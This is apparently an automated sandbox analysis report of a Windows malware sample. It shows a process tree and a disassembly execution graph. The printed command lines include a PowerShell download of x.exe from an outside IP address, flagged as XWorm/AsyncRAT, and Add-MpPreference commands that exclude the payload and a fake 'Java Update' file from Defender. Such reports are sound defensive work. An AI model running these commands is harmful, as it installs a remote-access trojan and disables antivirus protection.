                                                                      File size:92'160 bytes
                                                                      MD5 hash:A091F671B517C660C7A453158D32218A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:11:45:53
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:11:45:54
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D64C.tmp\D64D.tmp\D64E.bat C:\Users\user\Desktop\da6ke5KbfB.exe"
                                                                      Imagebase:0x7ff68c0e0000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:11:45:54
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command "Invoke-WebRequest -Uri http://45.141.26.234/x.exe -OutFile C:\Users\user\AppData\Local\Temp\x.exe"
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:11:45:59
                                                                      Start date:13/12/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\x.exe
                                                                      Imagebase:0x30000
                                                                      File size:41'472 bytes
                                                                      MD5 hash:F9A6811D7A9D5E06D73A68FC729CE66C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3264722419.0000000002301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.2053544136.0000000000032000.00000002.00000001.01000000.00000004.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.3264722419.000000000234A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 79%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:6
                                                                      Start time:11:46:04
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\x.exe'
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:11:46:04
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:11:46:08
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:11:46:08
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:11:46:18
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:11:46:18
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:11:46:33
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:11:46:33
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:13.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:1.7%
                                                                        Total number of Nodes:2000
                                                                        Total number of Limit Nodes:34
                                                                        execution_graph 10538 401f4c 10539 40e660 21 API calls 10538->10539 10540 401f54 10539->10540 10561 40e520 GetLastError TlsGetValue SetLastError 10540->10561 10542 401f5a 10562 40e520 GetLastError TlsGetValue SetLastError 10542->10562 10544 401f6b 10545 40e6c0 4 API calls 10544->10545 10546 401f73 10545->10546 10563 40e520 GetLastError TlsGetValue SetLastError 10546->10563 10548 401f79 10564 40e520 GetLastError TlsGetValue SetLastError 10548->10564 10550 401f81 10565 40a190 10550->10565 10554 401f8e 10569 405182 TlsGetValue 10554->10569 10556 401f99 10557 408e27 20 API calls 10556->10557 10558 401fa2 10557->10558 10559 4051a0 3 API calls 10558->10559 10560 401fa7 10559->10560 10560->10560 10561->10542 10562->10544 10563->10548 10564->10550 10570 40a120 10565->10570 10568 40e720 TlsGetValue 10568->10554 10569->10556 10571 40a130 10570->10571 10571->10571 10572 40e900 3 API calls 10571->10572 10573 401f88 10572->10573 10573->10568 10574 4020ce 10575 40e660 21 API calls 10574->10575 10576 4020d4 10575->10576 10581 402145 10576->10581 10587 4098c0 EnterCriticalSection 10576->10587 10578 402112 10579 40213b 10578->10579 10582 4098f7 2 API calls 10578->10582 10580 401fba 36 API calls 10579->10580 10580->10581 10583 402121 10582->10583 10584 402130 10583->10584 10590 40993e TerminateProcess 10583->10590 10586 40994f 7 API calls 10584->10586 10586->10579 10588 4098df 10587->10588 10589 4098e9 LeaveCriticalSection 10588->10589 10589->10578 10590->10584 7483 4011d0 7510 405373 EnterCriticalSection 7483->7510 7485 4011d5 7496 409fd0 SetUnhandledExceptionFilter 7485->7496 7487 4011da 7497 40ad35 7487->7497 7493 4011e9 7509 40a1b0 HeapDestroy 7493->7509 7495 4011ee 7496->7487 7498 4011df 7497->7498 7499 40ad3e 7497->7499 7501 40b110 7498->7501 7516 40e075 7499->7516 7502 40e075 2 API calls 7501->7502 7503 4011e4 7502->7503 7504 40d944 7503->7504 7505 40d951 7504->7505 7506 40d952 7504->7506 7505->7493 7507 40d967 7506->7507 7508 40d95b TlsFree 7506->7508 7507->7493 7508->7507 7509->7495 7511 405389 7510->7511 7512 4053ac LeaveCriticalSection 7510->7512 7513 40538a CloseHandle 7511->7513 7515 4053ab 7511->7515 7512->7485 7527 40e1b2 7513->7527 7515->7512 7517 40e082 7516->7517 7518 40e09e 7516->7518 7522 40e19b EnterCriticalSection 7517->7522 7518->7498 7521 40e088 7521->7518 7523 40e144 7521->7523 7522->7521 7525 40e150 7523->7525 7524 40e194 7524->7521 7525->7524 7526 40e18a LeaveCriticalSection 7525->7526 7526->7524 7528 40e1c3 HeapFree 7527->7528 7528->7511 7530 401000 memset GetModuleHandleW HeapCreate 7531 401044 7530->7531 7580 40e4d0 HeapCreate TlsAlloc 7531->7580 7533 401053 7583 40b120 7533->7583 7535 40105d 7586 40a1c0 HeapCreate 7535->7586 7537 40106c 7587 409669 7537->7587 7539 401071 7592 408dee memset InitCommonControlsEx CoInitialize 7539->7592 7541 401076 7593 4053b5 InitializeCriticalSection 7541->7593 7543 40107b 7594 405068 7543->7594 7552 40aa5a 16 API calls 7553 4010f4 7552->7553 7554 40a9c8 13 API calls 7553->7554 7555 40110f 7554->7555 7625 40e266 7555->7625 7557 40112d 7558 405068 4 API calls 7557->7558 7559 40113d 7558->7559 7560 40aa5a 16 API calls 7559->7560 7561 401148 7560->7561 7562 40a9c8 13 API calls 7561->7562 7563 401163 SetConsoleCtrlHandler 7562->7563 7631 409fb0 7563->7631 7565 401180 7637 40e520 GetLastError TlsGetValue SetLastError 7565->7637 7567 401186 7638 402eed 7567->7638 7571 401197 7663 401ba0 7571->7663 7574 4011ac 7770 403f53 7574->7770 8062 40ed40 HeapAlloc HeapAlloc TlsSetValue 7580->8062 7582 40e4f7 7582->7533 8063 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 7583->8063 7585 40b12e 7585->7535 7586->7537 8064 40d9d3 7587->8064 7591 409687 InitializeCriticalSection 7591->7539 7592->7541 7593->7543 8076 40e7d0 7594->8076 7596 401095 GetStdHandle 7597 40a460 7596->7597 8083 40a54f 7597->8083 7600 4010c3 7609 40aa5a 7600->7609 7601 40a48b 7602 40a494 7601->7602 7603 40a497 HeapAlloc 7601->7603 7602->7603 7604 40a513 HeapFree 7603->7604 7606 40a4ae 7603->7606 7605 40a524 7604->7605 7605->7600 8094 40de99 7606->8094 7610 40aa63 7609->7610 7611 4010ce 7609->7611 8163 40ab16 7610->8163 7620 40a9c8 HeapAlloc 7611->7620 7614 40dfc6 9 API calls 7616 40aa73 7614->7616 7615 40aaa0 7617 40aab3 HeapFree 7615->7617 7618 40aaa7 HeapFree 7615->7618 7616->7615 7619 40aa8e HeapFree 7616->7619 7617->7611 7618->7617 7619->7615 7619->7619 7621 40a9e7 HeapAlloc 7620->7621 7622 40a9fc 7620->7622 7621->7622 7623 40de99 11 API calls 7622->7623 7624 4010e9 7623->7624 7624->7552 8170 40e3b9 7625->8170 7628 40e283 RtlAllocateHeap 7629 40e2a2 memset 7628->7629 7630 40e2e6 7628->7630 7629->7630 7630->7557 7632 40a0d0 7631->7632 7633 40a0d8 7632->7633 7634 40a0fa SetUnhandledExceptionFilter 7632->7634 7635 40a0e1 SetUnhandledExceptionFilter 7633->7635 7636 40a0eb SetUnhandledExceptionFilter 7633->7636 7634->7565 7635->7636 7636->7565 7637->7567 8176 40e660 7638->8176 7642 402f02 8191 40e520 GetLastError TlsGetValue SetLastError 7642->8191 7644 402f57 8192 40e520 GetLastError TlsGetValue SetLastError 7644->8192 7646 402f5f 8193 40e520 GetLastError TlsGetValue SetLastError 7646->8193 7648 402f67 8194 40e520 GetLastError TlsGetValue SetLastError 7648->8194 7650 402f6f 8195 40d7a0 7650->8195 7654 402f8a 8200 405eb0 7654->8200 7656 402f92 8210 405170 TlsGetValue 7656->8210 7658 40118d 7659 40e560 TlsGetValue 7658->7659 7660 40e5a6 RtlReAllocateHeap 7659->7660 7661 40e589 RtlAllocateHeap 7659->7661 7662 40e5c7 7660->7662 7661->7662 7662->7571 7664 40e660 21 API calls 7663->7664 7665 401baf 7664->7665 8235 40e520 GetLastError TlsGetValue SetLastError 7665->8235 7667 401bb5 8236 40e520 GetLastError TlsGetValue SetLastError 7667->8236 7669 401bc7 8237 40e520 GetLastError TlsGetValue SetLastError 7669->8237 7671 401bcf 8238 409698 7671->8238 7675 401bdb LoadLibraryExW 7676 4051a0 3 API calls 7675->7676 7677 401be8 EnumResourceTypesW FreeLibrary 7676->7677 7696 401c13 7677->7696 7678 401e27 7678->7678 7679 401cb1 7680 40ab16 4 API calls 7679->7680 7681 401cbc 7680->7681 8246 40e520 GetLastError TlsGetValue SetLastError 7681->8246 7683 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7683->7696 7684 401cc2 8247 40e520 GetLastError TlsGetValue SetLastError 7684->8247 7686 401cca 8248 40e520 GetLastError TlsGetValue SetLastError 7686->8248 7688 401cd2 8249 40e520 GetLastError TlsGetValue SetLastError 7688->8249 7690 401cda 8250 40e520 GetLastError TlsGetValue SetLastError 7690->8250 7691 40e520 GetLastError TlsGetValue SetLastError 7691->7696 7693 401ce7 8251 40e520 GetLastError TlsGetValue SetLastError 7693->8251 7695 401cef 8252 405e10 7695->8252 7696->7678 7696->7679 7696->7683 7696->7691 7698 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7696->7698 7698->7696 7701 401cff 8261 40d780 7701->8261 7705 401d0c 7706 405eb0 6 API calls 7705->7706 7707 401d14 7706->7707 7708 40e560 3 API calls 7707->7708 7709 401d1e 7708->7709 8265 40e520 GetLastError TlsGetValue SetLastError 7709->8265 7711 401d28 8266 40e6c0 7711->8266 7713 401d30 7714 40e560 3 API calls 7713->7714 7715 401d3a 7714->7715 8271 40e520 GetLastError TlsGetValue SetLastError 7715->8271 7717 401d40 8272 40e520 GetLastError TlsGetValue SetLastError 7717->8272 7719 401d48 8273 40e520 GetLastError TlsGetValue SetLastError 7719->8273 7721 401d50 8274 40e520 GetLastError TlsGetValue SetLastError 7721->8274 7723 401d58 7724 40d780 8 API calls 7723->7724 7725 401d68 7724->7725 8275 405182 TlsGetValue 7725->8275 7727 401d6d 7728 405eb0 6 API calls 7727->7728 7729 401d75 7728->7729 7730 40e560 3 API calls 7729->7730 7731 401d7f 7730->7731 8276 40e520 GetLastError TlsGetValue SetLastError 7731->8276 7733 401d85 8277 40e520 GetLastError TlsGetValue SetLastError 7733->8277 7735 401d8d 8278 405f20 7735->8278 7737 401d9d 7738 40e560 3 API calls 7737->7738 7739 401da7 7738->7739 7739->7678 8286 40985e 7739->8286 7742 401e23 7744 40e5f0 HeapFree 7742->7744 7746 401e3c 7744->7746 7745 401dc6 8292 40e520 GetLastError TlsGetValue SetLastError 7745->8292 7748 40e5f0 HeapFree 7746->7748 7751 401e45 7748->7751 7749 401dce 8293 409872 7749->8293 7753 40e5f0 HeapFree 7751->7753 7755 401e4e 7753->7755 7757 40e5f0 HeapFree 7755->7757 7756 401ddf 8303 405160 7756->8303 7759 401e57 7757->7759 7760 40e5f0 HeapFree 7759->7760 7761 40119c 7760->7761 7761->7574 7945 402fad 7761->7945 7762 401dea 7762->7742 8306 40e520 GetLastError TlsGetValue SetLastError 7762->8306 7764 401e03 8307 40e520 GetLastError TlsGetValue SetLastError 7764->8307 7766 401e0b 7767 409872 21 API calls 7766->7767 7768 401e17 7767->7768 7769 40e560 3 API calls 7768->7769 7769->7742 7771 403f59 7770->7771 7771->7771 7772 40e660 21 API calls 7771->7772 7788 403f6b 7772->7788 7773 40e520 GetLastError TlsGetValue SetLastError 7773->7788 7774 40e520 GetLastError TlsGetValue SetLastError 7794 403fec 7774->7794 7775 405dc0 3 API calls 7775->7788 7776 405dc0 3 API calls 7776->7794 7777 40e520 GetLastError TlsGetValue SetLastError 7789 40406d 7777->7789 7778 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7778->7788 7779 405dc0 3 API calls 7779->7789 7780 40e520 GetLastError TlsGetValue SetLastError 7795 4040ee 7780->7795 7781 40e520 GetLastError TlsGetValue SetLastError 7790 40416f 7781->7790 7782 405dc0 3 API calls 7782->7795 7783 40e520 GetLastError TlsGetValue SetLastError 7796 4041f0 7783->7796 7784 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7784->7788 7785 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7785->7794 7787 40e520 GetLastError TlsGetValue SetLastError 7791 404275 7787->7791 7788->7773 7788->7775 7788->7778 7788->7784 7788->7794 7789->7777 7789->7779 7789->7795 7800 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7789->7800 7809 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7789->7809 7790->7781 7790->7796 7812 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7790->7812 7818 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7790->7818 8339 405dc0 7790->8339 7791->7787 7797 4042fa 7791->7797 7803 405dc0 3 API calls 7791->7803 7805 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7791->7805 7819 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7791->7819 7792 405dc0 3 API calls 7792->7796 7793 404404 8342 40e520 GetLastError TlsGetValue SetLastError 7793->8342 7794->7774 7794->7776 7794->7785 7794->7789 7799 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7794->7799 7795->7780 7795->7782 7795->7790 7801 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7795->7801 7811 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7795->7811 7796->7783 7796->7791 7796->7792 7802 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7796->7802 7813 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7796->7813 7806 405dc0 3 API calls 7797->7806 7814 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7797->7814 7820 40e520 GetLastError TlsGetValue SetLastError 7797->7820 7826 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7797->7826 7833 40437f 7797->7833 7799->7794 7800->7789 7801->7795 7802->7796 7803->7791 7804 404410 7808 40e6c0 4 API calls 7804->7808 7805->7791 7806->7797 7807 40e520 GetLastError TlsGetValue SetLastError 7807->7833 7810 404418 7808->7810 7809->7789 7816 40e6c0 4 API calls 7810->7816 7811->7795 7812->7790 7813->7796 7814->7797 7815 405dc0 3 API calls 7815->7833 7817 404422 7816->7817 7822 40e560 3 API calls 7817->7822 7818->7790 7819->7791 7820->7797 7821 40e560 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7821->7833 7823 40442e 7822->7823 8343 40e520 GetLastError TlsGetValue SetLastError 7823->8343 7825 404434 8344 403221 7825->8344 7826->7797 7827 40e6c0 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7827->7833 7830 40e560 3 API calls 7831 40444d 7830->7831 7832 40985e 17 API calls 7831->7832 7834 404452 GetModuleHandleW 7832->7834 7833->7793 7833->7807 7833->7815 7833->7821 7833->7827 8437 40e520 GetLastError TlsGetValue SetLastError 7834->8437 7836 40446b 8438 40e520 GetLastError TlsGetValue SetLastError 7836->8438 7838 404473 8439 40e520 GetLastError TlsGetValue SetLastError 7838->8439 7840 40447b 8440 40e520 GetLastError TlsGetValue SetLastError 7840->8440 7842 404483 7843 40d780 8 API calls 7842->7843 7844 404495 7843->7844 8441 405182 TlsGetValue 7844->8441 7846 40449a 7847 405eb0 6 API calls 7846->7847 7848 4044a2 7847->7848 7849 40e560 3 API calls 7848->7849 7850 4044ac 7849->7850 8442 40e520 GetLastError TlsGetValue SetLastError 7850->8442 7852 4044b2 8443 40e520 GetLastError TlsGetValue SetLastError 7852->8443 7854 4044ba 8444 40e520 GetLastError TlsGetValue SetLastError 7854->8444 7856 4044c2 8445 40e520 GetLastError TlsGetValue SetLastError 7856->8445 7858 4044ca 7859 40d780 8 API calls 7858->7859 7860 4044da 7859->7860 8446 405182 TlsGetValue 7860->8446 7862 4044df 7863 405eb0 6 API calls 7862->7863 7864 4044e7 7863->7864 7865 40e560 3 API calls 7864->7865 7866 4044f1 7865->7866 8447 402e49 7866->8447 7870 404504 8464 402150 7870->8464 7873 4051a0 3 API calls 7874 404514 7873->7874 8580 40196c 7874->8580 7880 404528 8671 403539 7880->8671 7883 40e560 3 API calls 7884 40454e PathRemoveBackslashW 7883->7884 7885 404562 7884->7885 8799 40e520 GetLastError TlsGetValue SetLastError 7885->8799 7887 404568 8800 40e520 GetLastError TlsGetValue SetLastError 7887->8800 7889 404570 8801 402ba6 7889->8801 7893 404582 8831 405182 TlsGetValue 7893->8831 7895 40458b 8832 4099a5 7895->8832 7898 4051a0 3 API calls 7899 404599 7898->7899 8836 40e520 GetLastError TlsGetValue SetLastError 7899->8836 7901 4045a5 7902 40e6c0 4 API calls 7901->7902 7903 4045ad 7902->7903 7904 40e6c0 4 API calls 7903->7904 7905 4045b9 7904->7905 7906 40e560 3 API calls 7905->7906 7907 4045c5 7906->7907 8837 403801 7907->8837 7911 4045d0 9031 401e66 7911->9031 7914 40e560 3 API calls 7915 4045e5 7914->7915 7916 4045f0 7915->7916 7917 404608 7915->7917 9177 40548c CreateThread 7916->9177 9187 402c55 7917->9187 7921 404611 9077 403c83 7921->9077 7946 40e660 21 API calls 7945->7946 7947 402fba 7946->7947 10459 40e520 GetLastError TlsGetValue SetLastError 7947->10459 7949 402fc0 10460 40e520 GetLastError TlsGetValue SetLastError 7949->10460 7951 402fc8 10461 40e520 GetLastError TlsGetValue SetLastError 7951->10461 7953 402fd0 10462 40e520 GetLastError TlsGetValue SetLastError 7953->10462 7955 402fd8 7956 40d780 8 API calls 7955->7956 7957 402fea 7956->7957 10463 405182 TlsGetValue 7957->10463 7959 402fef 7960 405eb0 6 API calls 7959->7960 7961 402ff7 7960->7961 7962 40e560 3 API calls 7961->7962 7963 403001 7962->7963 10464 40e520 GetLastError TlsGetValue SetLastError 7963->10464 7965 403007 10465 40e520 GetLastError TlsGetValue SetLastError 7965->10465 7967 40300f 10466 40e520 GetLastError TlsGetValue SetLastError 7967->10466 7969 403017 10467 40e520 GetLastError TlsGetValue SetLastError 7969->10467 7971 40301f 7972 40d780 8 API calls 7971->7972 7973 40302f 7972->7973 10468 405182 TlsGetValue 7973->10468 7975 403034 7976 405eb0 6 API calls 7975->7976 7977 40303c 7976->7977 7978 40e560 3 API calls 7977->7978 7979 403046 7978->7979 7980 402e49 35 API calls 7979->7980 7981 40304e 7980->7981 10469 40e520 GetLastError TlsGetValue SetLastError 7981->10469 7983 403058 7984 402150 122 API calls 7983->7984 7985 403063 7984->7985 7986 4051a0 3 API calls 7985->7986 7987 403068 7986->7987 10470 40e520 GetLastError TlsGetValue SetLastError 7987->10470 7989 40306e 10471 40e520 GetLastError TlsGetValue SetLastError 7989->10471 7991 403076 7992 409355 33 API calls 7991->7992 7993 403089 7992->7993 7994 40e560 3 API calls 7993->7994 7995 403093 7994->7995 7996 4031ea 7995->7996 10472 40e520 GetLastError TlsGetValue SetLastError 7995->10472 7996->7996 7998 4030aa 10473 40e520 GetLastError TlsGetValue SetLastError 7998->10473 8000 4030b2 10474 40e520 GetLastError TlsGetValue SetLastError 8000->10474 8002 4030ba 10475 40e520 GetLastError TlsGetValue SetLastError 8002->10475 8004 4030c2 8005 40d780 8 API calls 8004->8005 8006 4030d4 8005->8006 10476 405182 TlsGetValue 8006->10476 8008 4030d9 8009 405eb0 6 API calls 8008->8009 8010 4030e1 8009->8010 8011 40e560 3 API calls 8010->8011 8012 4030eb 8011->8012 10477 40e520 GetLastError TlsGetValue SetLastError 8012->10477 8014 4030f1 10478 40e520 GetLastError TlsGetValue SetLastError 8014->10478 8016 4030f9 10479 40e520 GetLastError TlsGetValue SetLastError 8016->10479 8018 403101 10480 40e520 GetLastError TlsGetValue SetLastError 8018->10480 8020 403109 8021 40d780 8 API calls 8020->8021 8022 40311b 8021->8022 10481 405182 TlsGetValue 8022->10481 8024 403120 8025 405eb0 6 API calls 8024->8025 8026 403128 8025->8026 8027 40e560 3 API calls 8026->8027 8028 403132 8027->8028 10482 40e520 GetLastError TlsGetValue SetLastError 8028->10482 8030 403138 8031 403e37 84 API calls 8030->8031 8032 403148 8031->8032 8033 40e560 3 API calls 8032->8033 8034 403154 8033->8034 10483 40e520 GetLastError TlsGetValue SetLastError 8034->10483 8036 40315a 8037 403e37 84 API calls 8036->8037 8038 40316a 8037->8038 8039 40e560 3 API calls 8038->8039 8040 403174 PathAddBackslashW 8039->8040 10484 40e520 GetLastError TlsGetValue SetLastError 8040->10484 8042 403183 10485 40e520 GetLastError TlsGetValue SetLastError 8042->10485 8044 403193 8045 40e6c0 4 API calls 8044->8045 8046 40319b 8045->8046 8047 40e6c0 4 API calls 8046->8047 8048 4031a7 8047->8048 10486 405182 TlsGetValue 8048->10486 8050 4031ac 8051 4023b8 34 API calls 8050->8051 8052 4031b4 8051->8052 8053 4051a0 3 API calls 8052->8053 8054 4031b9 8053->8054 10487 40e520 GetLastError TlsGetValue SetLastError 8054->10487 8056 4031c3 8057 40e6c0 4 API calls 8056->8057 8058 4031cb 8057->8058 8059 40e560 3 API calls 8058->8059 8060 4031d7 PathRemoveBackslashW 8059->8060 8061 402c55 141 API calls 8060->8061 8061->7996 8062->7582 8063->7585 8065 40d9e2 8064->8065 8066 40da20 TlsGetValue HeapReAlloc TlsSetValue 8065->8066 8067 40d9f8 TlsAlloc HeapAlloc TlsSetValue 8065->8067 8068 40da60 8066->8068 8069 40da5c 8066->8069 8067->8066 8074 40e1f2 HeapAlloc 8068->8074 8069->8068 8070 409674 8069->8070 8073 40dbac HeapAlloc HeapAlloc InitializeCriticalSection 8070->8073 8073->7591 8075 40da6c 8074->8075 8075->8070 8077 40e7e1 wcslen 8076->8077 8078 40e84d 8076->8078 8080 40e816 HeapReAlloc 8077->8080 8081 40e7f8 HeapAlloc 8077->8081 8079 40e855 HeapFree 8078->8079 8082 40e838 8078->8082 8079->8082 8080->8082 8081->8082 8082->7596 8084 40a46f HeapAlloc 